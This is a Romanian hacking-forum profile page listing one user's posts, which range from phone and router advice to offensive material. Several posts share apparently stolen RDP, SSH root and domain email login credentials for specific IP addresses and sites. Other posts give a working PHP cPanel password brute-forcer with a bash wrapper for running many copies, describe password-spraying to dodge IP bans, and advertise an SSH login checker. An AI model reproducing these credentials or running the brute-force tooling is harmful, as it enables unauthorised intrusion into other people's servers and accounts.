Jump to content

shop_toolz

Members
  • Posts

    29
  • Joined

  • Last visited

Everything posted by shop_toolz

  1. Daca vreisa faci o comunitate macar cum sunt novavets sau nrns ai de lucru. SI de investit, in special de investit.
  2. 86.47.99.246@office;password Ireland - Windows Server 2003
  3. ofer rdpuri gratuite, postez cate unul imediat ce se posteaza in topic ca anteriorul a fost luat. Va rog fara cereri si fara cerinte deosebite. #1 91.98.138.53@Administrator;123456 Iran, Islamic Republic of - Windows 7
  4. O singura observatie am. Din memoriile mele Greedy pe care o recomanzi are un mic clitch. Construirea pas cu pas a solutiei se cam bate cap in cap cu conditia ta ca nu trebuie sa aiba rezervorul gol. Practic, trebuie verificat la care din urmatoarele statii va avea cat mai putina benzina in rezervor, asta la fiecare trecere prin while-ul de la greedy(daca imi aduc aminte cu while era). Dar pot exista solutii in care este optim sa nu opreasca atunci cand are neaparat mai putina benzina in rezervor. In fine, e un pic mind twisting, o sa incerc sa vin cu o rezolvare greedy si un contraexemplu pentru care metoda greseste.
  5. Yep, imi place structura de limbaj liniar, daca ii pot spune asa si faptul ca nu mai este fragmentat de asa multe paranteze. (Desi fara syntax highlighting ar putea parea cam incurcat). In fine, o sa ma documentez mai mult si poate ii acord o sansa, revin cu niste pareri imediat ce le formez.
  6. Well, nytro, fara sa mi-o iei in nume de rau, este. In 5 minute iti fac un script care sa-mi ia toate usernameurile de pe site si in alte 5 minute fac un bruteforcer. Un dictionary pe RO si 30% din conturi sunt sterse. ~Later edit: Ok, inca un lucru. Ca atacator cunosc mailul si contul filelist al unui anumit x-ulescu. Desi este o gandire prepubertina(ideea de bruteforce) cred ca e cunoscut faptul ca multi dintre noi folosesc aceiasi parola peste tot. Poate nu aici, dar un utilzator obisnuit cam asa face. Fac bruteforce la filelist.ro pana primesc ok-ul. Am sanse sa aflu si parola mailului asa, pe langa faptul ca ii sterg contul lui x-ulescu. In fine, intradevar mare lucru nu se poate face, dar e o scapare.
  7. Noroc, nu vreau sa supar pe nimeni prin postarea asta. De la inceput tin sa mentionez ca am incercat sa il contactez pe Toxic(administrator), dar fara succes. Nu am afectat in vreun fel integritatea siteului si nici nu am de gand, pentru ca multi imi sunt prieteni. "Vulnerabilitatea" pe care am gasit-o se refera la pagina delacct.php, prin care orice utilizator isi poate sterge contul, folosindu-se doar de datele de login. Nu este ceruta confirmare prin email si nici macar o confirmare on page. Nu asta ar fi problema, problema consta in faptul ca site-ul nu limiteaza numarul de attempts, asta insemnand ca oricine poate realiza un atac de tip bruteforce asupra oricarui cont, finalitatea unui atac reusit fiind stergerea respectivului cont. In fine, trimiterea variabilelor se face in POST, fiind vorba de 2 stringuri(n, numele de utilizator si p, parola). Cum ziceam, nu am nimic cu baietii si sper ca in urma mesajului meu sa fixeze aceasta scapare. Acum am putea incepe o intreaga contradictie despre gradul de vinovatie al developerului sau al userului in caz ca se intampla ceva, dar mai bine sa nu o facem. Tin sa subliniez si eu cat de important este sa folositi parole cat mai non-dictionary si mai complexe.
  8. Poate mai aveti nevoie [New Domain] bridgewaterbaptist.com - test@bridgewaterbaptist.com - test [New Domain] fdaregistro.com - test@fdaregistro.com - test [New Domain] natalephotography.com - test@natalephotography.com - test [New Domain] eqraa.com - test@eqraa.com - test [New Domain] gruporesidencial.com - test@gruporesidencial.com - test [New Domain] elbarbary.sd - test@elbarbary.sd - test123 [New Domain] greece-car-rentals.gr - test@greece-car-rentals.gr - test123 [New Domain] thepeaches.com - test@thepeaches.com - test [New Domain] mrit-gov.com - sales@mrit-gov.com - sales [New Domain] hagenwilliams.com - test@hagenwilliams.com - test [New Domain] mcbroadcasting.co.nz - test@mcbroadcasting.co.nz - test [New Domain] travel-on-the-web.com - test@travel-on-the-web.com - test [New Domain] songbuyout.uvwebservices.com - contact@songbuyout.uvwebservices.com - contact123 [New Domain] uvwebservices.com - test@uvwebservices.com - test [New Domain] hh3f.com - sales@hh3f.com - sales [New Domain] panaceapharma.ca - test@panaceapharma.ca - test123
  9. Daca mai gasesti pe undeva Allview Speed City SuperSlim, ia-o. Eu zic ca este cea mai buna alegere pana in 500 ron. Ai procesor dual core de 1.5, procesor grafic mali 400(iti duce ceva jocuri), 1GB RAM ddr3. De asemenea e rapida si in aproape un an de utilizare nu a fost nevoie de service sau alte tampenii. Bateria e bunicica si, per total in banii tai, e must buy.
  10. Este inca in curs de dezvoltare, deci posibil sa apara bug-uri sau probleme de logica, insa pentru astea va rog sa lasati un mesaj aici astfel incat sa se poata remedia. Nume - [RST] SSH Login Checker Versiune - first.release Download link - Download [RST].SSH.Login.Checker-0.0.1_dev.zip from Sendspace.com - send big files the easy way Changelog: 15-09-2013 Prima versiune. [+]Nologin / Login (verificare si scriere in fisier. In cazul loginului se iau si date despre serverul verificat) [+]Variabile: Timeout + Nologin_pass. [+]Doar un thread, pentru moment. Exemplu de login ok: -------------------------- Good login on: root:1q2w3e4r:*.*.*.* OS: Debian GNU/Linux 6.0 \n \l Rams: MemTotal: 524288 kB MemFree: 2968 kB Processor: Total number of cores:2 model name : Intel(R) Xeon(R) CPU E5-2620 0 @ 2.00GHz Some Networking Data: 1: lo: <LOOPBACK,UP,LOWER_UP> mtu 16436 qdisc noqueue state UNKNOWN link/loopback 00:00:00:00:00:00 brd 00:00:00:00:00:00 2: venet0: <BROADCAST,POINTOPOINT,NOARP,UP,LOWER_UP> mtu 1500 qdisc noqueue state UNKNOWN link/void Uptime Info: 15:31:40 up 10 days, 2:24, 1 user, load average: 0.60, 0.30, 0.21 -------------------------- Exemplu de utilizare: php check.php Starting process for: root:admin:84.183.21.182 [BAD] Did not found login credentials on 84.183.21.182. *in fisierul unchecked.php aveti, cate unul pe linie, serverele in aceasta forma. user:pass:ip
  11. Dar agramat cu siguranta esti.
  12. Fa-ti o livada de nectarini. Banii sunt de ajuns, mana de lucru nu e foarte scumpa si ar trebui sa vinzi bine, mai ales daca faci aprovizionarea unor lanturi mai mari. Si, in plus, nectarine romanesti mai rar.
  13. Hotmail folosesc si eu. E de 100 ori mai curat, rapid si practic decat GMail. Anyway, parerea mea e ca, in timp, o sa se ramana la ideea de open source OS + marketplace. Parerea mea.
  14. @ Cum ziceai si tu, e doar un forum. Nu ai ce sa discuti cu unele persoane de aici, sindromul de superioritate e o boala care ii(ne) afecteaza pe toti din zona. In fine, keep your head down!
  15. sudo su, ->get root. while testing vad ca nu baneaza trafic suspicios. nice.
  16. @eusimplu: o solutie ar fi urmatoarea. Mod de functionare: //Citirea primei linii din passwords.txt (123456) //Incarcarea tuturor ipurilor. //Foreach, pentru fiecare ip se incearca parola 123456. //Citirea urmatoarei linii din passwords.txt(password) //reluarea ciclului de bruteforce..etc Asta ar rezolva in unele cazuri problema cu banip, deoarece la 10.000 servere in bruteforce ar trebui sa fie destul timp intre 2 login attempts. Am rescris functia de bruteforce si am adaugat o verificare, este cpanel sau nu.
  17. Dupa 6 logari gresite. Sunt foarte multe servere cu parola 123456/password/qwerty. Daca iti faci o lista cu 6 parole, prinzi binisor. In plus, am un php bruteforce single thread care aduce rezultate bune. (10-15 loginuri/500 servere cu cpanele).
  18. Noroc, propun urmatorul subiect de discutii: Am realizat urmatoarele chestii: brute.php: <?php error_reporting(0); function cpanel_check($host,$user,$pass,$timeout){ $ch = curl_init(); curl_setopt($ch, CURLOPT_URL, "https://".$host.":2083"); curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1); curl_setopt($ch, CURLOPT_SSL_VERIFYPEER,0); curl_setopt($ch, CURLOPT_SSL_VERIFYHOST,0); curl_setopt($ch, CURLOPT_HTTPAUTH, CURLAUTH_BASIC); curl_setopt($ch, CURLOPT_USERPWD, $user.":".$pass); curl_setopt ($ch, CURLOPT_CONNECTTIMEOUT, $timeout); curl_setopt($ch, CURLOPT_FAILONERROR, 1); $data = curl_exec($ch); if ( curl_errno($ch) == 28 ) { return "Request Time Out"; exit; } elseif ( curl_errno($ch) == 0 ){ echo "Good: $user:$pass:$host\r\n"; if(!($_OutFile = fopen("owned.txt", "a"))) ExitF ("Cannot open the log file"); fputs($_OutFile, "$user,$pass,$host - valid login information!!!\r\n"); exit() ; } else echo "Bad: $user:$pass:$host\r\n"; curl_close($ch); } $host=$argv[1]; $user=str_replace("http://","",$host); $user=str_replace("www.","",$user); $user=str_replace("-","",$user); $user=substr($user,0,8); $passwords = file_get_contents("passwords.txt"); $passwords = explode("\n",$passwords); foreach ($passwords as $pass){ if($pass!=""){ cpanel_check($host,$user,$pass,3);}} ?> Si "metoda de multi-threading", #!/bin/bash IPFILE="cpanels.txt" cat $IPFILE | while read IP; do CMD=`ps -eaf | grep -c brute.php` if [ "$CMD" -lt "100" ]; then php brute.php $IP & else sleep 10 fi done Problema e ca nu prinde nimic. Nu gasesc o problema la el, la 3-4 cpanele bune verifica loginul, daca ii dau 2000 urluri de cpanel nu face nimic..nu inteleg de ce. Daca bag un cpanel bun in restul de urluri la fel, nu-lk ia.
  19. Da, pai wirelessul voiam sa-l fac. Internet prin cablu mergea daca bagam in LAN1(acum wan) cablul de la rds si din LAN2 plecam cu ethernet in PC. Ma conectam cu user si parola si mergea bine. Multumesc inca o data, am salvat 100 ron pe care ii pot investi in altceva.
  20. Ar fi o problema, nu pot sa accesez 192.168.1.1. Am bagat cablul de net de la rds, care iese din EoC la router, in WAN1 si am iesit din wan2 in ethernet-ul pcului. Netul merge ok, wifiul nu. Cand incerc sa accesez 192.168.1.1 imi da timed out. //edt: rezolvat: Pentru eroarea de mai sus, activarea protocolului TCP/IP in adaptorul de retea fixeaza. Merge bine, ping ok, i'm hepi! //edit2: Multumesc, Renegade!
  21. Salut, Acum cateva luni am reziliat contractul cu Clicknet si am ramas cu modemul WiFi pe care l-am cumparat in perioada cand eram client la ei, un Huawei HG655b. Momentan sunt pe retea de fibra optica, dar de la stalp vin cu coaxial pana la un EOC si din EOC pleaca Ethernet. Se poate schimba firmware-ul modemului de la clicknet astfel inca sa il pot folosi pe reteaua celor de la RDS?
  22. 89.121.153.164,root, 89.122.13.34,root,root 89.122.217.79,root,root 89.122.148.184,root, 89.122.216.197,root, 89.122.186.12,root, 89.122.130.152,db, 89.126.89.172,root, 89.128.220.237,root, 89.128.168.133,root, 89.134.112.95,db, 89.134.144.165,root,root 89.134.152.59,root, 89.135.183.37,root,root 89.134.90.241,root, 89.135.127.201,root,password 89.140.185.44,root,root 89.140.249.2,db, 89.142.187.186,db, 89.142.194.239,db, 89.142.141.209,db, 89.143.228.202,root,root 89.142.255.112,root, 89.143.174.211,root,root 89.146.199.141,root,root Have fun!
  23. Eu cred ca era alta intrebarea. Raspunsurile posibile sunt 4, din care doua sunt identice. Deci alegand a sau d ajungem la aceiasi finalitate. Concluzionam ca avem doar 3 raspunsuri posibile. Sansa in cazul unui singur raspuns posibil este de 100%, in cazul a 3 raspunsuri se imparte sansa la 3, deci 33, 33%.
×
×
  • Create New...